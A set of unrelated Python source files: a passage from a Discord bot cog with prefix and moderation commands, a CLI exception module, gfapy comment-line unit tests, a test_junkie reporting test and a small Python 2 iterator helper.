            {ctx.prefix}add prefix "eviee pls "
            {ctx.prefix}prefix add ?!
        """
        lru = self.bot.lru_prefix[ctx.guild.id]
        prefix = prefix.strip('"').strip("'")

        if len(prefix) > 50:
            return await ctx.error(info='The prefix can not be over 50 characters long. Please try again.')

        if prefix in lru:
            return await ctx.error(info=f'`"{prefix}"` is already an assigned prefix.')

        async with self.bot.pool.acquire() as conn:
            await conn.execute("""UPDATE guilds SET prefixes = prefixes || $1::text WHERE id IN ($2)""",
                               prefix, ctx.guild.id)

        lru.append(prefix)
        await ctx.send(f'The prefix `"{prefix}"` has successfully been added.')

    @prefix.command(name='remove')
    async def remove_prefix(self, ctx, *, prefix: str):
        """Remove a Prefix from Eviee currently being used in your guild.

        Examples
        ----------
        <prefix>prefix remove <custom_prefix>
        <prefix>remove prefix <custom_prefix>

            {ctx.prefix}remove prefix "eviee pls "
            {ctx.prefix}prefix remove ?!
        """
        lru = self.bot.lru_prefix[ctx.guild.id]
        prefix = prefix.strip('"').strip("'")

        if prefix not in lru:
            return await ctx.error(info=f'`"{prefix}"` is not currently assigned to me.')

        lru.remove(prefix)
        await self.bot.pool.execute("""UPDATE guilds SET prefixes = array_remove(prefixes, $1::text)
                                       WHERE id IN ($2)""", prefix, ctx.guild.id)

        await ctx.send(f'Successfully removed `"{prefix}"` from my assigned prefixes.')

    @prefix.command(name='list')
    async def list_prefix(self, ctx):
        """List the available prefixes for your guild.

        Examples
        ----------
        <prefix>prefix list
        <prefix>list prefix

            {ctx.prefix}prefix list
            {ctx.prefix}list prefix
        """
        await ctx.paginate(title=f'Prefixes for {ctx.guild.name}',
                           entries=self.bot.lru_prefix[ctx.guild.id],
                           fmt='`"',
                           footer='You may also mention me.')

    @commands.command(name='prefixes', cls=utils.EvieeCommand)
    async def _prefixes(self, ctx):
        """An alias to `prefix list`.

        Examples
        ----------
        <prefix>prefixes

            {ctx.prefix}prefixes
        """
        await ctx.paginate(title=f'Prefixes for {ctx.guild.name}',
                           entries=self.bot.lru_prefix[ctx.guild.id],
                           fmt='`"',
                           footer='You may also mention me.')

    @commands.command(name='ban', cls=utils.EvieeCommand)
    @commands.bot_has_permissions(ban_members=True)
    @commands.has_permissions(ban_members=True)
    async def do_ban(self, ctx, member: discord.Member, *, reason: str = None):
        """Ban a member from your guild.

        Parameters
        ------------
        member: [Required]
            The member you wish to ban. This could be either a name, mention or ID.
        reason: str [Optional]
            Provide a reason for banning the member.

        Examples
        ----------
        <prefix>ban <member> <reason>

            {ctx.prefix}ban Noob For being a noob.
            {ctx.prefix}ban @Noob
        """
        dn = str(member)

        try:
            await ctx.guild.ban(member, reason=reason)
        except discord.HTTPException:
            return await ctx.send(f'Banning `{dn}` has failed. Please try again.')

        await ctx.send(f'Successfully banned: **`{dn}`**')

    @commands.command(name='softban', cls=utils.EvieeCommand, aliases=['sb'])
    @commands.bot_has_permissions(ban_members=True)
    @commands.has_permissions(ban_members=True)
    async def do_softban(self, ctx, member: discord.Member, *, reason: str = None):
        """Soft-Ban a member from your guild.

        Soft bans are similar to kicks, but unlike kicks, messages from the user will also be removed.

        Aliases
        ---------
            sb

        Parameters
        ------------
        member: [Required]
            The member you wish to soft-ban. This could be either a name, mention or ID.
        reason: str [Optional]
            Provide a reason for banning the member.

        Examples
        ----------
        <prefix>softban <member> <reason>

            {ctx.prefix}softban Noob For being a noob.
            {ctx.prefix}sb @Noob
        """
        dn = str(member)

        try:
            await ctx.guild.ban(member, reason=reason)
            await asyncio.sleep(1)
            await ctx.guild.unban(member, reason=f'Softban - {str(ctx.author)}')
        except discord.HTTPException:
            return await ctx.send(f'Soft-Banning `{dn}` has failed. Please try again.')

        await ctx.send(f'Successfully Soft-Banned: **`{dn}`**', delete_after=10)

    @commands.command(name='cleanup', cls=utils.EvieeCommand)
    @commands.has_permissions(manage_messages=True)
    async def do_cleanup(self, ctx, limit: int = 20):
        """Cleanup a bot session's messages.

        !Manage Messages is required to run this command fully!

        Parameters
        ------------
        limit: int [Optional]
            The max amount of messages to try and clean. This defaults to 20.

        Examples
        ----------
        <prefix>cleanup <limit>

            {ctx.prefix}cleanup 30
            {ctx.prefix}cleanup
        """
        messages = []
        perms = await ctx.hasperms(member=ctx.guild.me, manage_messages=True)
        controllers = [e.controller_message.id for e in self.bot.get_cog('Music').queues.values()]

        async for message in ctx.channel.history(limit=limit):
            if message.id in controllers:
                continue
            if message.content.startswith(ctx.prefix) and perms:
                messages.append(message)
            elif message.author == ctx.guild.me:
                messages.append(message)

        if not messages:
            return await ctx.send('No messages to delete...')

        if not perms:
            for i, m in enumerate(messages):
                if i == 10:
                    break
                await m.delete()
        else:
            await ctx.channel.delete_messages(messages)

        botm = len([m for m in messages if m.author == ctx.guild.me])
        userm = len(messages) - botm

        embed = discord.Embed(title='Cleanup',
                              description=f'Removed **{len(messages)}** messages successfully.',
                              colour=0xffd4d4)
        if not perms:
            embed.add_field(name='Missing Permissions',
                            value='Could not delete any user messages due to missing'
                                  ' **Manage Messages** permissions.')
        embed.set_footer(text=f'User Messages - {userm} | Bot Messages - {botm}')

        await ctx.send(embed=embed, delete_after=30)

    @do_cleanup.error
    async def do_cleanup_error(self, ctx, error):
        if isinstance(error, commands.MissingPermissions):
            await ctx.send('Manage Messages is required to run this command.')

    @do_ban.error
    @do_softban.error
    async def do_ban_error(self, ctx, error):
        if isinstance(error, commands.BadArgument):
            await ctx.send(f'{error}')
        elif isinstance(error, commands.MissingPermissions):
            await ctx.send('Ban Members is required to run this command.')
        elif isinstance(error, commands.BotMissingPermissions):
            await ctx.send('I require the Ban Members permission.')

    async def on_guild_join(self, guild):
        chan = self.bot.get_channel(486156641566457856)
        await chan.send(f'❤ - **{guild.name}**({guild.id}) | Members: {guild.member_count}')

    async def on_guild_remove(self, guild):
        chan = self.bot.get_channel(486156641566457856)
        await chan.send(f'💔 - **{guild.name}**({guild.id}) | Members: {guild.member_count}')
11571247
from typing import Optional


class ColumboException(Exception):
    """Base exception for exceptions raised by Columbo"""


class DuplicateQuestionNameException(ColumboException):
    """Multiple questions use the same name."""


class CliException(ColumboException):
    """An error occurred while processing command line arguments."""

    @classmethod
    def invalid_value(
        cls, value: str, argument_name: str, error_message: Optional[str] = None
    ) -> "CliException":
        formatted_error_message = f": {error_message}" if error_message else ""
        return cls(
            f"'{value}' is not a valid value for '{argument_name}'{formatted_error_message}"
        )
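# A minimal usage sketch (hypothetical argument values, not taken from the
# Columbo codebase) showing how invalid_value assembles a uniform message:
#
#   CliException.invalid_value("yes", "--retries", "expected an integer")
#   -> CliException("'yes' is not a valid value for '--retries': expected an integer")
#
#   CliException.invalid_value("yes", "--retries")
#   -> CliException("'yes' is not a valid value for '--retries'")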
11571252
import unittest

import gfapy


class TestApiComments(unittest.TestCase):

    def test_initialize(self):
        l = gfapy.line.Comment("# hallo")
        self.assertEqual("# hallo", str(l))
        l = gfapy.line.Comment(["#", "hallo", "\t"])
        self.assertEqual("#\thallo", str(l))

    def test_fields(self):
        l = gfapy.line.Comment("# hallo")
        self.assertEqual("hallo", l.content)
        self.assertEqual(" ", l.spacer)
        l.content = "hello"
        self.assertEqual("hello", l.content)
        self.assertEqual("# hello", str(l))
        l.spacer = " "
        self.assertEqual("hello", l.content)
        self.assertEqual("# hello", str(l))

    def test_validation(self):
        with self.assertRaises(gfapy.FormatError):
            gfapy.line.Comment(["#", "hallo\nhallo"])
        with self.assertRaises(gfapy.FormatError):
            gfapy.line.Comment(["#", "hallo", "\n"])
        gfapy.line.Comment(["#", "hallo", "\n"], vlevel=0)  # nothing raised
        l = gfapy.line.Comment(["#", "hallo"])
        l.content = "hallo\n"  # nothing raised
        with self.assertRaises(gfapy.FormatError):
            str(l)
        l.content = "hallo"
        str(l)  # nothing raised
        l.spacer = "\n"  # nothing raised
        with self.assertRaises(gfapy.FormatError):
            str(l)
        l = gfapy.line.Comment(["#", "hallo"], vlevel=3)
        with self.assertRaises(gfapy.FormatError):
            l.content = "hallo\n"
        with self.assertRaises(gfapy.FormatError):
            l.spacer = "\n"

    def test_from_string(self):
        s = "# this is a comment"
        l = gfapy.Line(s)
        self.assertEqual(gfapy.line.Comment, l.__class__)
        self.assertEqual(s[2:], l.content)
        self.assertEqual(" ", l.spacer)
        s = "#this is another comment"
        l = gfapy.Line(s)
        self.assertEqual(gfapy.line.Comment, l.__class__)
        self.assertEqual(s[1:], l.content)
        self.assertEqual("", l.spacer)
        s = "#\t and this too"
        l = gfapy.Line(s)
        self.assertEqual(gfapy.line.Comment, l.__class__)
        self.assertEqual(s[3:], l.content)
        self.assertEqual(s[1:3], l.spacer)
        s = "#: and this too"
        l = gfapy.Line(s)
        self.assertEqual(gfapy.line.Comment, l.__class__)
        self.assertEqual(s[1:], l.content)
        self.assertEqual("", l.spacer)

    def test_to_s(self):
        s = "# this is a comment"
        l = gfapy.Line(s)
        self.assertEqual(s, str(l))
        s = "#this is another\tcomment"
        l = gfapy.Line(s)
        self.assertEqual(s, str(l))
        s = "#this is another\tcomment"
        l = gfapy.Line(s)
        l.spacer = " "
        self.assertEqual("# " + s[1:], str(l))

    def test_tags(self):
        with self.assertRaises(gfapy.ValueError):
            gfapy.line.Comment(["#", "hallo", " ", "zz:Z:hallo"])
        l = gfapy.Line("# hallo zz:Z:hallo")
        self.assertEqual("hallo zz:Z:hallo", l.content)
        self.assertEqual(None, l.zz)
        with self.assertRaises(gfapy.RuntimeError):
            l.zz = 1
        with self.assertRaises(gfapy.RuntimeError):
            l.set("zz", 1)
        self.assertEqual(None, l.get("zz"))

    def test_to_gfa1(self):
        s = "# this is a comment"
        l = gfapy.Line(s, version="gfa2")
        self.assertEqual(gfapy.line.Comment, l.__class__)
        self.assertEqual("gfa2", l.version)
        self.assertEqual(s, str(l))
        self.assertEqual("gfa2", l.to_gfa2().version)
        self.assertEqual(s, str(l.to_gfa2()))
        self.assertEqual("gfa1", l.to_gfa1().version)
        self.assertEqual(s, str(l.to_gfa1()))

    def test_to_gfa2(self):
        s = "# this is a comment"
        l = gfapy.Line(s, version="gfa1")
        self.assertEqual(gfapy.line.Comment, l.__class__)
        self.assertEqual("gfa1", l.version)
        self.assertEqual(s, str(l))
        self.assertEqual("gfa1", l.to_gfa1().version)
        self.assertEqual(s, str(l.to_gfa1()))
        self.assertEqual("gfa2", l.to_gfa2().version)
        self.assertEqual(s, str(l.to_gfa2()))

    def test_rgfa_comments(self):
        gfa = gfapy.Gfa()
        c1 = "#this is a comment"
        c2 = "# this is also a comment"
        c3 = "#and \tthis too!"
        gfa.add_line(c1)  # nothing raised
        gfa.add_line(c2)  # nothing raised
        gfa.add_line(c3)  # nothing raised
        self.assertEqual([c1, c2, c3], [str(x) for x in gfa.comments])
        self.assertEqual(c1, str(gfa.comments[0]))
        gfa.rm(gfa.comments[0])
        self.assertEqual([c2, c3], [str(x) for x in gfa.comments])
        gfa.comments[0].disconnect()
        self.assertEqual([c3], [str(x) for x in gfa.comments])
11571267
import sys
import time

sys.path.insert(1, __file__.split("tests")[0])

from test_junkie.runner import Runner
from tests.junkie_suites.Reporting import LoginSessions, Login, Dashboard


def test_reporting():
    f = __file__.replace("test_reporting.py", "test_{}".format(int(time.time())))
    html = "{}.html".format(f)
    xml = "{}.xml".format(f)
    runner = Runner([Login, LoginSessions, Dashboard],
                    monitor_resources=True,
                    html_report=html,
                    xml_report=xml)
    runner.run()
    suites = runner.get_executed_suites()
    for suite in suites:
        suite.metrics.get_average_performance_of_after_class()
        suite.metrics.get_average_performance_of_before_class()
        suite.metrics.get_average_performance_of_after_test()
        suite.metrics.get_average_performance_of_before_test()
11571318
from itertools import tee, izip, chain


def cycle_pairs(iterable):
    """
    Cycles through the given iterable, returning an iterator which yields
    the current and the next item. When reaching the end it returns the
    last and the first item.
    """
    first, last = iterable[0], iterable[-1]
    a, b = tee(iterable)
    iter(b).next()
    return chain(izip(a, b), [(last, first)])
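# A minimal usage sketch (assuming the Python 2 runtime that the izip/.next()
# calls above require); each element is paired with its successor, and the
# final pair wraps around to the first element:
if __name__ == '__main__':
    print(list(cycle_pairs([1, 2, 3])))  # [(1, 2), (2, 3), (3, 1)]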